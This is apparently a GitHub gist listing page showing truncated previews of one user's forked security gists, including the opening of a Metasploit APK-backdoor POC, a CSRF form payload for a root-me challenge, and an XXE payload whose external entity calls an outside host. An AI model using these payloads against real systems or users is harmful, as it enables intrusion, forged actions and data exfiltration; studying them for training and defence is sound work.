Sender Policy Framework (SPF) is an email validation system designed to prevent spam by detecting email spoofing.
# get spf record domain from google
dig TXT +short google.com
# get spf record from google
dig @8.8.8.8 TXT +short _spf.google.com
Murthysagi
/ apk-embed-payload.rb
Created
May 30, 2016 10:17
— forked from skulltech/apk-embed-payload.rb
POC for injecting Metasploit payloads on arbitrary APKs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # apk_backdoor.rb | |
| # This script is a POC for injecting metasploit payloads on | |
| # arbitrary APKs. | |
| # Authored by timwr, Jack64 | |
| # | |
| require 'nokogiri' | |
| require 'fileutils' |
Murthysagi
/ SPF-records.md
Created
December 5, 2016 11:49
— forked from githubutilities/SPF-records.md
SPF Records
Murthysagi
/ payload.html
Created
January 11, 2017 09:41
— forked from vkobel/payload.html
CSRF payload for token based mechanism (root-me sample)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <body onload="get()"> | |
| <form id="form-payload" action="?action=profile" method="POST" enctype="multipart/form-data"> | |
| <input type="hidden" name="username" value="your_username"/> | |
| <input type="hidden" name="status" value="on"/> | |
| <input type="hidden" id="forged-token" name="token" value=""/> | |
| <input type="submit" value="go"/> | |
| </form> | |
| <script> |
Murthysagi
/ gist:08b75e4888bcfc598cdce5c9408d7c09
Created
December 14, 2017 12:14
— forked from jesusprubio/gist:8f092af4ca252e252eab
Proposal: A Node.js penetration test framework
Hi guys! Since I started to write Bluebox-ng I've been tracking the different security projects I found written in Node.js. Now we've published the first stable version we think it's the right moment to speak among us (and, of course, everyone interested in it :).
- I think we're rewriting the same stuff in our respective projects again and again. For example, almost any tool supports IPv6 because the functions we need are still not present in the Node core and the libraries I found (IMHO) were not enough.
- There're different projects implementing exactly the same thing, ie: port scanners.
- We're working in a too new environment, so we need to make it together.
Murthysagi
/ Buffer Overflow Tutorial in Kali.md
Created
January 18, 2018 17:12
— forked from apolloclark/Buffer Overflow Tutorial in Kali.md
Buffer overflow demonstration in Kali Linux, based on the Computerphile video
This tutorial is based on the Computerphile video, made by Dr. Mike Pound
https://www.youtube.com/watch?v=1S0aBV-Waeo
The tutorial will show you how to trigger and exploit a buffer overflow attack against a custom C program, using Kali Linux 32-bit PAE 2016.1.
Torrent Link: https://images.offensive-security.com/virtual-images/Kali-Linux-2016.1-vbox-i686.torrent
Murthysagi
/ how-to-oscp-final.md
Created
July 31, 2018 14:19
— forked from unfo/how-to-oscp-final.md
Murthysagi
/ tmux-cheats.md
Created
August 27, 2018 18:42
— forked from Starefossen/tmux-cheats.md
My personal tmux cheat sheet for working with sessions, windows, and panes. `NB` I have remapped the command prefix to `ctrl` + `a`.
Murthysagi
/ XXE_payloads
Created
September 3, 2018 19:03
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
Murthysagi
/ urllib-request_basicAuth.py
Created
February 11, 2019 14:08
— forked from kaito834/urllib-request_basicAuth.py
Python 3.x snippet code for Basic Authentication HTTP request by urllib.request
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # | |
| # I tested by Python 3.4.3 on Windows 8.1 | |
| # Python 3.4.3 (v3.4.3:9b73f1c3e601, Feb 24 2015, 22:43:06) [MSC v.1600 32 bit (Intel)] on win32 | |
| import urllib.request | |
| import getpass | |
| # If you access to url below via Proxy, | |
| # set environment variable 'http_proxy' before execute this. |
OlderNewer